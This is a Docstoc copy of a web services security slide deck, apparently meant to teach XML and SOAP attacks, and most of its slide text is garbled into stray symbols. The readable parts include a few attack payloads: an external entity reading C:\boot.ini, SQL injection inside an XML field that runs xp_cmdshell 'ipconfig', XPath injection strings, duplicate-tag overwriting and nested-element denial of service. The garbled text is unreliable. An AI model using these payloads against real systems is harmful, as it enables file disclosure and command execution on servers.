Docstoc

Web Services

Document Sample
Web Services Powered By Docstoc
					        ! "
   #
$ %&%
'
(
$ %&%         )

* '

* +# ,

* -. /                ! ")             (
                                     0 ( 1 -&   +#
  )  /                    2 #     1 -. / $    $    /
          1       %

*      /   34 #                           -   5
        ( %
    3. / 6 & 3        5               (        (   7
    8    %                8   9

*     #           6       )

* &               /       #               :
  %
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #




                                   ;
! ")             4#   5 %
* 6%    )

* ) %       4#

* )         4#




                            ?
6%              )
* !%        6%      )       @

* 6%        )           %                    %
        #       %                   #

    "

* (             %                   %    A       %       %
        %       B                       %
                    "

*                               %                    %
                                                     %       #




                                                                 :
! ") %                   4#
*       4#       C       %   % %   %       %
    %

* 5          %       %        %



* ) %        4#      #   %             D
    %
! ")                                                4#
*   ! "                                        #                   %
                      "
                      /                                                 #

*   +         %               "        /        "                  #
          %                           F

    ,         #               G            % (           G         #
                                           %

                          #       G                  %         %        /
        % (                                            %           /"
         # #              "               6
                                          =%          # #
          /                                         %%         >

    ;   (             H %                 GH         "                       %
                      " "                   %        "                      6%
                                      %                      %
          "       %                            % (            -H
                                                              =     5       1>




                                                                                 E
! ")                                      4#
 ?                   G4#          %                 /           %
                                 % G

 :   ) %                             G     #            %
       %                                  %     %

     )    /        ) %               G)             "   G       "
         %                   %

 E             7     / 5                   G)
                     #           "                              /

 I   (     9             )       /G (      #
           #                                        $
     #                                                  #           /

 J   ) %            4#       G2                     %       #
       %                      %




                                                                        I
)

! ")               4#    5 %

 58
< &         2
            =           79     >

           2

           9

! "    #       &

           ! "     #




                                   J
<58
*
                                        <?xml version='1.0'?>
    <58                                  <?xml version='1.0'?>
                                             <NAME>
                                              <NAME>
    0 $   7         =               >           <FIRSTNAME>Nish</FIRSTNAME>
                                                 <FIRSTNAME>Nish</FIRSTNAME>
    0 ) "    =      "           >               </MIDDLENAME>
                                                 </MIDDLENAME>
                                             </NAME>
    0   ) )= %
         6                  >                 </NAME>
                                             <!-- NAME, FIRSTNAME, etc are Nodes
                                              <!-- NAME, FIRSTNAME, etc are Nodes
    0                                         -->
                                               -->

                                            <NAME TYPE=“LASTNAME”>Bhalla</LASTNAME>
                                             <NAME TYPE=“LASTNAME”>Bhalla</LASTNAME>

* 6       % "          %K@
  /         2                           <?xml version='1.0'?>
                                         <?xml version='1.0'?>
                                        <!DOCTYPE SIMPLE
  (                                      <!DOCTYPE SIMPLE
                                            [[
                                                  <!ELEMENT NAME ANY>
                                                   <!ELEMENT NAME ANY>
                                                  <!ELEMENT MyName "NishBhalla">
* L        0                                       <!ELEMENT MyName "NishBhalla">
                                            ]]
    0 .         (       K               >>
               %   "                    <name>
                                         <name>
      %         7"      %                   &MyName;
                                             &MyName;
                                        </name>
                                         </name>




                                                                                    ,
 58
< &                 G 2               79
   58
* < 2
  2        %        %            58
                                < 7               %       7               %
       "
                       58
                    5 < =        #        >   $ 6'            /

     5 8
  G + M                                                   !;          N
     <
  G ) M#       "            N


* !%       <58                  (     '             F             %
                        #       %             9


   58
* < 9
  9             %                             % %       % <58
               %




                                                                          ,,
 58
< 9
   58
* < 9                           %               %
     #      6%              %       %           #

  0   6 =               6               >
      * $


  0 <     <
          = 58      %               >
      * H       #


  0             #                )
                                O= G        >
      *     #       "   #




                                                    ,
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #




                                   ,;
                      2                  0      5
                                               + &
* 8       2
* 4        # 2



 <?xml version='1.0'?>
  <?xml version='1.0'?>
 <Employee>
  <Employee>
           <name>Nish Bhalla</name>
            <name>Nish Bhalla</name>
  <name>Nish Bhalla</name>
   <name>Nish Bhalla</name>
  <name>Nish Bhalla</name>
   <name>Nish Bhalla</name>
  <name>Nish Bhalla</name>
   <name>Nish Bhalla</name>
   ...
    ...
 </Employee>
  </Employee>


 <?xml version='1.0'?>
  <?xml version='1.0'?>
 <Employee>
  <Employee>
           <name>
            <name>
                     <name>
                      <name>
                               <name>
                                <name>
                                         <name> ...
                                          <name> ...
 </Employee>
  </Employee>




                                                       ,?
                     2                 0        <
                                               ) &
   58
* < (F             @.

 <?xml version='1.0'?>
  <?xml version='1.0'?>
 <Employee>
  <Employee>
           <EmployeeID>2208</EmployeeID>
            <EmployeeID>2208</EmployeeID>
           <Firstname>Nish</Firstname>
            <Firstname>Nish</Firstname>
           <Lastname>Bhalla</Lastname>
            <Lastname>Bhalla</Lastname>
 </Employee>
  </Employee>




 <?xml version='1.0'?>
  <?xml version='1.0'?>
 <Employee>
  <Employee>
           <EmployeeID>2208</EmployeeID>
            <EmployeeID>2208</EmployeeID>
           <Firstname>Nish</Firstname>
            <Firstname>Nish</Firstname>
           <EmployeeID>666</EmployeeID> <!-- SAX Parser sees the id is 666 -->
            <EmployeeID>666</EmployeeID> <!-- SAX Parser sees the id is 666 -->
           <Firstname>Lord</Firstname> <!– on this attack -->
            <Firstname>Lord</Firstname> <!– on this attack -->
           <Lastname>Bhalla</Lastname>
            <Lastname>Bhalla</Lastname>
 </Employee>
  </Employee>




                                                                                  ,:
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #




                                   ,
                    6                         =6 >
                             <?xml version='1.0'?>
*   6                   %     <?xml version='1.0'?>
                             <!-- Employee.DTD Resides on server-->
    % <58               "     <!-- Employee.DTD Resides on server-->
                             <!DOCTYPE EMPLOYEE
                              <!DOCTYPE EMPLOYEE
                                 [[
     " %                               <!ELEMENT EMPLOYEE(NAME)>
                                        <!ELEMENT EMPLOYEE(NAME)>
                                       <!ELEMENT NAME ANY>
                                        <!ELEMENT NAME ANY>
                                 ]]
*                            >>

    6% 6    "           %
    % <58                    <?xml version='1.0'?>
                              <?xml version='1.0'?>
                    %        <!DOCTYPE employee SYSTEM "employee.dtd">
                              <!DOCTYPE employee SYSTEM "employee.dtd">
                             <Employee>
                              <Employee>
                                 <name>Nish Bhalla</name>
                                  <name>Nish Bhalla</name>
                             </Employee>
                              </Employee>


*      !                    6%   6        "
                %                               %

*                   !                    6                      " %




                                                                          ,E
                          6 4
* 5            %        A   "                    %   #
         /     6        % <58

* 6%                                                 A
              %     6                                    % "


<!DOCTYPE Employee
 <!DOCTYPE Employee
[[        <!ELEMENT EMPLOYEE(NAME)>
           <!ELEMENT EMPLOYEE(NAME)>
          <!ELEMENT NAME ANY>
           <!ELEMENT NAME ANY>
          <!ENTITY name SYSTEM "C:\boot.ini">
           <!ENTITY name SYSTEM "C:\boot.ini">
]]
>>
<EMPLOYEE>
 <EMPLOYEE>
          <NAME>Nish Bhalla</NAME>
           <NAME>Nish Bhalla</NAME>
</EMPLOYEE>
 </EMPLOYEE>
<EMPLOYEE>
 <EMPLOYEE>
          <NAME> &Something;</NAME>
           <NAME> &Something;</NAME>
</EMPLOYEE>
 </EMPLOYEE>




                                                               ,I
                              6 4
*       6                              % <58              "
                                           "


    )                    "
     )                     "
    KP$ 6 6
     KP$( Q
       66 Q       Q 6 5 - - R"         1S
         (        Q65        R"         1S

    )
     )
    KP$ 6 6
     KP$( Q
       66 Q       Q 6 5 -- 77 77 77 77   77         1S
         (        Q65                                1S

    )       %      "
     )      %      "
       66 Q
        (Q
    KP$ 6 6       Q 6 5 -%      77            1S
     KP$ (        Q 6 5 -%       77            1S

    ))        "
              "       ""
     KP$( Q
       66 Q
    KP$ 6 6
         (        Q 6 5 -%
                  Q 6 5 -%      77
                                 77                   1S
                                                       1S

    "
    "                             ##                          $
                                                              $




                                                                  ,J
< 8&
*   < 8=         "            G %   8            >

*   6%                        <58

    0 % &    6
             =                  >   # #
      <58            7

         '( <
    0 % & ) = 8'                   "
                                  + F >     "              %         %
      M                            G'
                                < 8 +F < 8N

    0 %      <           "      %       #         2
                                                 )(             %
           <58   %

*   <58                         %     G      %             G             %
             % <58

    K@ G     %           T-     7   1 % T-           1@S


    6%           % <58                                         <86
          % <58 *                            +
                                  <
     * <              #           "      %                 /                 %      "

             0 (      9
                 *                               ,     -     .
                                                  ,    -      .
                                                 K@        T-, 1 1   T-:       S
                                                                             1@ S
                     8
                 * L (F                           K@        T-,       T-:     1@
                 * (   4#                              .
                                                       .
                                                 K@        T-, 1 1   T-G:      S
                                                                             1@ S
                                                  K@        T-,       T-G:    1@

                                                           )
                                                           )

                                                 K@        T-, 1     T- :1@S
                                                  K@        T-, 1     T- :1@S

"                                                 /& 0
"                                                  /& 0

KK     T-
        T-      1S
                 1S                              <?xml version='1.0'?>
                                                  <?xml version='1.0'?>
                                                 <Employee>
                                                  <Employee>
 K@ #
K@                   S
               T3, 3@ S
      #         T3, 3@                                <name>Nish Bhalla’; exec
                                                       <name>Nish Bhalla’; exec
   K            S                                   master..xp_cmdshell ‘ipconfig’;--
    K            S                                    master..xp_cmdshell ‘ipconfig’;--
               ) 5 SF#
                 5
             K$ ) SF#                 >BK7$5 S
                                      =>B ) 5S
              K$                       =K7$ )        </name>
                                                      </name>
    K7           S
     K7           S                              </Employee>
                                                  </Employee>
K7   S
 K7    S

K             T3U         3          )
                                  T3$ 5 3S
 K             T3U            3       )
                                   T3$ 5 3S

                                                                                        ,
 26
< ) . (F
* <58                      %    "      "

   2
* < %                      #                   (          "
     #                     <58                % " %< 86
  <2

* 2 %
  0       "        58
                % < 2 %
  0   %           %   %
  0   %          A
* '
  0       "     %
* 2
  0 (         %        %    %

 K                   %     8Q
                      T3 52 +   $ 5  $ V
                                M ) TV %N3S

              PATH                            Filter
 26
< ) . (F
*        26
        <).

*        7W7$

*        7$     7X6

*        7$     M7         Q 1N
                       T -< Y

*        7$     M7    S,     N

   4
* + 5            26
              % <).

*        7$     M7    S,           T,
                                  , N




                                        ;
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #




                                   ?
! "         #        &
* ! "   #       "
                             <?xml version='1.0' ?>
                                <?xml version='1.0' ?>
  %                          <SOAP-ENV:Envelope
                                <SOAP-ENV:Envelope
                             xmlns:SOAP-ENV="http://s.xmlsoap.org/soap/envelope/">
  0 <58                         xmlns:SOAP-ENV="http://s.xmlsoap.org/soap/envelope/">
                             <SOAP-ENV:Body>
                                <SOAP-ENV:Body>
      )
  0 + 2                      ..
                                ..
                             </SOAP-ENV:Body>
  0 ! 8                         </SOAP-ENV:Body>
                             </SOAP-ENV:Envelope>
                                </SOAP-ENV:Envelope>
  0 +       C   (


* 6%        %
   %        #
                             <schema targetNamespace="http://e.com/quote.xsd"
                              <schema targetNamespace="http://e.com/quote.xsd"
                                     xmlns="http://www.w3.org/2000/XMLSchema">
   %                     "            xmlns="http://www.w3.org/2000/XMLSchema">
                                   <element name="TradePriceRequest">
                                    <element name="TradePriceRequest">
   #                                 <complexType>
                                      <complexType>
                                        <all>
                                         <all>
                                          <element name="tiSym" type="string"/>
                                            <element name="tiSym" type="string"/>
                                        </all>
* ! "  #            42                   </all>
                                     </complexType>
                                      </complexType>
  "                                </element>
                                    </element>
    % " /




                                                                                        :
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #
! "                #           G
*     %            +!) 26 2, 9
                         +                  "           ! "   #   @
    , C#      (
      & / )
    ; & / ) %                          5
    ?                      <
                           =   >'
    : &   +#
      (F    '
    E (         .
    I (
    J         #
    , (                        5
    0 1

*          %#
    0 1
       *   2           /        58
                               < (F           26
                                           / < ) . (F


*         "    #                   %
    0 1
       *    58 2
           < G4        /
       *   5 G




                                                                      E
! "                  #            0
* 4              2"           ! "      #
  0                   %           %C   ( %     "       #       "       %"


* C                  2"                    ! "     #
  0 H           +
                =                      %           %       >
       * !      8
               0 (
               0     6
               0 &        (
       *   '         !        8
       *   (         -7       1
       *   (
       *   (


* @!       8     /                             #                   D   %
                     "                     #   #




                                                                            I
C     (0       %             P
* 4        %        "   #

  &
* (5 5         )2       $6
                         6       % ?C   (&   4
      #    "

   %
* 6 C     (&       4        %   "            ,
  Z




                                                 J
! "           #        0            5
 <?xml version="1.0" encoding="utf-8" ?>
- <soap:Envelope
   xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
- <soap:Body>
- <soap:Fault>
  <faultcode>soap:Client</faultcode>
  <faultstring>System.Web.Services.Protocols.SoapException:
   Server did not recognize the value of HTTP Header SOAPAction: .
   at
   System.Web.Services.Protocols.Soap11ServerProtocolHelper.RouteR
   equest() at
   System.Web.Services.Protocols.SoapServerProtocol.Initialize()
   at
   System.Web.Services.Protocols.ServerProtocolFactory.Create(Type
   type, HttpContext context, HttpRequest request, HttpResponse
   response, Boolean& abortProcessing)</faultstring>
  <detail />
  </soap:Fault>
  </soap:Body>
  </soap:Envelope>


                                                               ;
 58 2
< G4
* 5    /  %             "      /
        < G4
       = 58 2 >                           %    %%
   %

* (                                3 %   %#     3
  %     %   62                           <58
         62
       %. 6

http://www.sharp-deas.net/download/monkeyshell.tar.gz




                                                        ;,
         ! "                         #                 G
         *                      %           % "                    @@@@@@@
                                                                  @@@@@@@


                   • WS-Trust                   • WS-Addressing            • WS-Inspection               • Java WSDP   • AXIS
• XML
                   • WS-Security                • WS-Eventing              •WS-Secure Conversation       • Java-WS     • EBXML
• WSDL
                   • WS-Federation              • WS-Topics                • WS-Provisioning             • JAX-RPC     • RPC
• SOAP
                   • WS-Polling                 • WS-Security Policy       • WS-Distributed Management   • JAXR        • DOC
• UDDI
                   • WS-Atomic Transactions     • WS-Resource Properties   • WS-Transfer                 • JAXP        • DOM
• WSS
                   • WS-Business Activity       • WS-Resource Lifetime     • WS-Enumeration              • JAXB        • XSLFO
• WS-I
                   • WS-Coordination            • WS-Reliable Messaging    • WS-Eventing                 • SAAJ        • XQuery
•XPath
                   • WS-Manageability           • WS-Policy Framework      • WS-Enhancements             • XWSS        • WSCI
• XOP
                   • WS-Brokered Notification   • WS-Policy Attachments    • BPEL4WS                     • JAX-WSA     • WSDM
• XML-Encryption
                   • WS-Base Notification       • WS-Policy Assertion      • WSXL                        • OASIS       • MTOM
• XML-Signature
                   • WS-Attachments                                        • WSRP                        • SAML        • RAMP
• SOA
                                                                                                         • XACML       • BICS
• DISCO




    * )                  ! G                               @



                                                                                                                                  ;
*    %                           % @

    0     2         2
    0 5 #  < 8"                  6
    0 2        )<            "         #
       %
    0 6 / "   ! G       M8       "         %
      ! G    N
       58
    0 < G
       58
    0 < G
    0 5   %                  %         /




                                               ;;
)                 #
* !       #       )




              "



      2




                      ;?
                                    2
* +               %#        #               '
                                            =         :   >
   [                                    F
* ! %#        /          F                                        '

* ! %#        G %                   "             #
            " /
  0   . /         ! ")
  0   . /$    $   /
  0   &   +#    )   /                       2 #
  0   !      2
            < 2
  0   !         6
* ! %#

  0 4#                              : 5           B
       ( %
    . / 6 &    : 5              B( V(
      8 9   $Q 6                 B ($        B            B
    6    B  '
* !                     "                             F
  0    %    + !) 26      2              +!) 26                "       Q)   2
      2 F   8
            =   " ) $     <     >


                                                                           ;:
         (
* $ %% &%

 '
 $ %&%   $ X
         = %                       >
 6     +      ?E E   ?II;
  %   "   $  Z        ,;J   J,JI




                                       ;

				
DOCUMENT INFO
Tags: security
Stats:
views:12
posted:4/22/2010
language:English
pages:36
burmesepentester burmesepentester YGN Ethical Hacker http://yehg.net
About